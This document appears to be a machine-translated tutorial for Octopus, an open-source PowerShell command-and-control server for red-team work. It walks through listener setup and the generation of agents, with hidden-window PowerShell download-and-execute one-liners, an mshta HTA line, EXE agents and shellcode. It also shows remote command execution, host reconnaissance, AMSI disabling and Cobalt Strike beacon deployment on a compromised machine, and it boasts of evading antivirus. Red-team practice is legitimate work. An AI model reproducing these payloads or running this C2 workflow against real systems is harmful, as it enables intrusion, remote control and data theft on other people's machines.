Octopus is an open source, python based pre operating C2 server, which can control the powershell proxy of Octopus through HTTP/S.
The main purpose of creating Octopus is to use it before any red team operation. In this case, you can use Octopus to attack targets and collect information before starting the actual red team operation, rather than contacting the complete combat Arsenal and infrastructure.
Octopus works in a very simple way, executing commands and exchanging information with C2 through well encrypted channels, which makes it invisible and undetectable in almost all AV, endpoint protection and network monitoring solutions.
Octopus has a cool function called ESA, which represents "endpoint situational awareness". It will collect some important information about the target, which will help you better understand the target network endpoints you will face in the operation process, so that you can define your actual operation according to this information.
Octopus is designed to be hidden and hidden when communicating with C2, because it uses AES-256 as the encrypted channel between powershell agent and C2 server by default. You can also choose to use SSL/TLS by providing a valid certificate for your domain and configuring the Octopus C2 server to use it.
Octopus has many features that allow you to gain insight into upcoming activities before you actually need to deploy a complete Arsenal or tools and technologies, such as:
- Control the proxy through HTTP/S.
- Execute system commands.
- Download / upload files.
- Load the external powershell module.
- An encrypted channel (AES-256) is used between C2 and the agent.
- Use obscure techniques to execute commands and transmit results.
- Create custom and multiple listeners for each target.
- Generate different types of payloads.
- All Windows versions with powershell 2.0 and later are supported.
- Without touching PowerShell Exe process, run Octopus windows executable agent.
- Automatically collect information from the endpoint (endpoint situational awareness) function.
You can install all the requirements of octopus in the following ways:
pip install -r requirements.txt
You need nasm installed for linux and the "mingw-w64" compiler to use the shellcoding feature and spoofing the args agent.
You can install nasm on a Debian based distribution using the following command:
apt install nasm
You can mingw-w64 use the following command to install on a Debian based distribution:
apt install mingw-w64
Octopus has been tested on the following operating systems:
- Ubuntu (18.04)
- Ubuntu (16.04)
- Kali Linux (2019.2)
You also need to install mono to ensure that you can compile C# source code without problems.
Octopus relies on mono CSC binary to compile C# source code. You can install it through the following command. The command apt install mono devel has been tested on kali and ubuntu 16.04.
You can use octopus without installing mono, but you will not be able to use generate_exe command.
Also note that compiling C# depends on system Management. Automation. DLL assembly with SHA1 hash a43ed886b68c6ee913da85df9ad2064f1d81c470.
First, make sure to download the latest version of Octopus using the following command:
git clone https://github.com/mhaskar/Octopus/
Then you need to install the requirements using the following command:
pip install -r requirements.txt
After that, you can start the octopus server by running the following command:
./octopus.py
After running it, you will see the following:
Using Octopus is very simple and easy to use, because you only need to start a listener and generate your agent based on the information of that listener.
You can generate as many listeners as you need, and then you can start interacting with the agents connected to them.
Profile settings
Before you start using Octopus, you must set up a URL processing profile to control the behavior and functions of C2. Because octopus is an HTTP based C2, it relies on the URL to process the connection and ensure that the URL will not be used as a signature or IoC in the network you are currently attacking. You can easily customize and rename the URL as needed.
Configuration file settings currently only support URL processing, automatic termination values, and headers.
Set up your profile
To start setting up your profile, you need to edit the profile Py file, which contains many key variables, they are:
- file_reciever_url: handles file downloads.
- report_url: process ESA report.
- command_send_url: process the command that will be sent to the target.
- command_receiver_url: process the command that will be executed on the target.
- first_ping_url: process the first connection from the target.
- server_response_header: this header will be displayed in each response.
- auto_kill: a variable that controls when to terminate the agent after N failed connections to C2
example:
#!/usr/bin/python3 # this is the web listener profile for Octopus C2 # you can customize your profile to handle a specific URLs to communicate with the agent # TODO : add the ability to customize the request headers # handling the file downloading # Ex : /anything # Ex : /anything.php file_receiver_url = "/messages" # handling the report generation # Ex : /anything # Ex : /anything.php report_url = "/calls" # command sending to agent (store the command will be executed on a host) # leave <hostname> as it with the same format # Ex : /profile/<hostname> # Ex : /messages/<hostname> # Ex : /bills/<hostname> command_send_url = "/view/<hostname>" # handling the executed command # Ex : /anything # Ex : /anything.php command_receiver_url = "/bills" # handling the first connection from the agent # Ex : /anything # Ex : /anything.php first_ping_url = "/login" # will return in every response as Server header server_response_header = "nginx" # will return white page that includes HTA script mshta_url = "/hta" # auto kill value after n tries auto_kill = 10
Agents and listeners will be configured to communicate with each other using this profile. Next we need to know how to create a listener.
audience
Octopus has two main listeners, "http listener" and "https listener", which have the same options.
HTTP listener:
listen_ The HTTP command requires the following parameters to start:
- BindIP defines the IP address that the listener will use.
- BindPort defines the port to listen on.
- The hostname will be used to request the payload from.
- Interval the number of seconds the agent waits before checking the command.
- URL the name of the page that hosts the payload.
- Listener_name the name of the listener to use.
You can also run the following listen_http command to see an example of it:
Octopus >>listen_http [-] Please check listener arguments ! Syntax : listen_http BindIP BindPort hostname interval URL listener_name Example (with domain) : listen_http 0.0.0.0 8080 myc2.live 5 comments.php op1_listener Example (without domain) : listen_http 0.0.0.0 8080 172.0.1.3 5 profile.php op1_listener ########## Options info : BindIP IP address that will be used by the listener BindPort port you want to listen on Hostname will be used to request the payload from Interval how may seconds that agent will wait before check for commands URL page name will hold the payload Listener_name listener name to use Octopus >>
We can start the listener with the following command:
listen_http 0.0.0.0 8080 192.168.178.1 5 page.php operation1
The following results will be returned:
Octopus >>listen_http 0.0.0.0 8080 192.168.178.1 5 page.php operation1 Octopus >> * Serving Flask app "core.weblistener" (lazy loading) * Environment: production WARNING: Do not use the development server in a production environment. Use a production WSGI server instead. * Debug mode: off Octopus >>
One listener has been started successfully. We can use the following listeners command to view all listeners:
Octopus >>listeners Name IP Port Host Interval Path SSL ---------- ------- ------ ------------- ---------- -------- ----- operation1 0.0.0.0 8080 192.168.178.1 5 page.php False Octopus >>
HTTPS listener:
To create an HTTPS listener, you can use the following listen_https command:
Octopus >>listen_https [-] Please check listener arguments ! Syntax : listen_https BindIP BindPort hostname interval URL listener_name certficate_path key_path Example (with domain) : listen_https 0.0.0.0 443 myc2.live 5 login.php op1_listener certs/cert.pem certs/key.pem Octopus >>listen_https 0.0.0.0 443 myc2.live 5 login.php darkside_operation certs/cert.pem certs/key.pem SSL listener started ! [+]darkside_operation Listener has been created Octopus >> * Serving Flask app "core.weblistener" (lazy loading) * Environment: production WARNING: Do not use the development server in a production environment. Use a production WSGI server instead. * Debug mode: off Octopus >>
This listen_ The HTTPS command starts with the following parameters:
- BindIP: This is the IP address that the listener will use
- BindPort: This is the port you want to listen on
- Host name: to be used from
- Interval: the number of seconds the agent waits before checking the command
- URL page: the name will hold the payload
- Listener_name: the name of the listener to use
- certficate_path: the path of a valid SSL certcase (called fullchain.pem for letsencrypt certcases)
- key_ Path: the path of the valid key of the SSL Certificate (called key.pem for the letsencrypt certificate)
Note that you need to provide a valid SSL certificate associated with the domain you are using.
Build agent
Powershell oneliner
To generate a proxy for the listener, operation1 we can use the following command:
generate_powershell operation1
We will get the following results:
Octopus >>generate_powershell operation1
#====================
1) powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');"
2) powershell -w hidden "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');"
3) powershell -w hidden "$w = (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');Invoke-Expression $w;"
Note - For Windows 7 clients you may need to prefix the payload with "Add-Type -AssemblyName System.Core;"
e.g. powershell -w hidden "Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.1:8080/page.php');"
Hack your way in ;)
#====================
Octopus >>Now we can use this oneliner to start our agent.
HTA single line
To generate HTA oneliner for listener 1, we can use the following command:
generate_hta operation1
We will get the following results:
Octopus >>generate_hta operation1 #==================== mshta http://192.168.178.1:8080/hta spread it and wait ;) #==================== Octopus >>
Note that you can use profile.hta with / HTA py
Octopus EXE agent
To generate an EXE proxy for the listener, operation1 we can use the following command:
generate_unmanaged_exe operation1 /opt/Octopus/file.exe
We will get the following results:
Octopus >>generate_unmanaged_exe darkside_operation2 /opt/Octopus/file.exe [+] file compiled successfully ! [+] binary file saved to /opt/Octopus/file.exe Octopus >>
Note that you must install mono CSC to compile C# source code.
Octopus spoofing parameter agent
You can generate a new EXE agent that will Adam Chester's excellent research Run a Powershell process with spoofed parameters.
To generate this exe, you can use the following command:
Octopus >>generate_spoofed_args_exe [-] Please select a listener and check your options ! Syntax : generate_spoofed_args_exe listener_name output_path Example : generate_spoofed_args_exe listener1 /opt/Octopus/file.exe Octopus >>
Generate x64 shellcode and x86 shellcode
Octopus can generate x64 and x86 shellcode s from version 1.2. The generated shellcode starts powershell with CreateProcessA Exe oneliner, which will start the powershell agent.
To generate x64 shellcode, you can use the following command:
Octopus >>generate_x64_shellcode [-] Please select a listener and check your options ! Syntax : generate_x64_shellcode listener_name Example : generate_x64_shellcode listener1 Octopus >>
To generate x86 shellcode, you can use the following command:
Octopus >>generate_x86_shellcode [-] Please select a listener and check your options ! Syntax : generate_x86_shellcode listener_name Example : generate_x86_shellcode listener1 Octopus >>
Interact with agents
First, you can use the list command to list all connected agents to get the following results:
Octopus >>list
Session IP Hostname PID Username Domain Last ping OS
--------- ------------ ----------- ----- ------------- ------------ ------------------------ --------------------------------
1 192.168.1.43 HR-PC-TYRMJ 10056 hr-pc\labuser darkside.com Tue Sep 3 10:22:07 2019 Microsoft Windows 10 Pro(64-bit)
Octopus >>Then we can use the interact command to interact with the host, as shown below:
Octopus >>list
Session IP Hostname PID Username Domain Last ping OS
--------- ------------ ----------- ----- ------------- ------------ ------------------------ --------------------------------
1 192.168.1.43 HR-PC-TYRMJ 10056 hr-pc\labuser darkside.com Tue Sep 3 10:22:07 2019 Microsoft Windows 10 Pro(64-bit)
Octopus >>interact 1
(HR-PC-TYRMJ) >>You can use the following help command to list all available commands:
Octopus >>list
Session IP Hostname PID Username Domain Last ping OS
--------- ------------ ----------- ----- ------------- ------------ ------------------------ --------------------------------
1 192.168.1.43 HR-PC-TYRMJ 10056 hr-pc\labuser darkside.com Tue Sep 3 10:22:07 2019 Microsoft Windows 10 Pro(64-bit)
Octopus >>interact 1
(HR-PC-TYRMJ) >> help
Available commands to use :
Hint : if you want to execute system command just type it and wait for the results
+++++++++
help show this help menu
exit/back exit current session and back to the main screen
clear clear the screen output
download download file from the target machine
deploy_cobalt_beacon deploy cobalt strike powershell beacon in the current process
load load powershell module to the target machine
disable_amsi disable AMSI on the target machine
report get situation report from the target
(HR-PC-TYRMJ) >>To execute the system command directly, we can type the command directly, and then check the waiting time according to the interval we set when creating the listener.
(HR-PC-TYRMJ) >> ipconfig [+] Command sent , waiting for results (HR-PC-TYRMJ) >> Command execution result is : Windows IP Configuration Ethernet adapter Ethernet1: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : home Link-local IPv6 Address . . . . . : fe80::f85f:d52b:1d8d:cbae%10 IPv4 Address. . . . . . . . . . . : 192.168.1.43 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 Ethernet adapter Ethernet: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Ethernet adapter Bluetooth Network Connection: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : (HR-PC-TYRMJ) >>
In this case, the command has been encrypted and then sent to the agent. After that, the client will decrypt the command and execute it. The agent will encrypt the result, and finally send it back to C2 to decrypt and display the result
We can also use the report command to obtain ESA information, as shown below:
(HR-PC-TYRMJ) >> report [+] Command sent , waiting for results (HR-PC-TYRMJ) >> Endpoint situation awareness report for HR-PC-QNGAV ============= Hostname : HR-PC-QNGAV Domain : darkside.com OS : Microsoft Windows 10 Pro(64-bit) OS build : 10.0.17134 OS arch : 64-bit AntiVirus : Symantec SIEM solution : False Internal interfaces/IPs : IP : 192.168.178.144 IP : 172.12.1.20 Device language : en-US Device uptime : 41.6386169797778 hours Device local time : 21:55(09/09/2019) (HR-PC-TYRMJ) >>
You can place the external powershell module in the modules directory and execute load module ps1.
You can also list all modules in the module directory by executing the following modules command:
(HR-PC-TYRMJ) >> modules PowerView.ps1 (HR-PC-TYRMJ) >> load PowerView.ps1 [+] Module should be loaded ! (HR-PC-TYRMJ) >>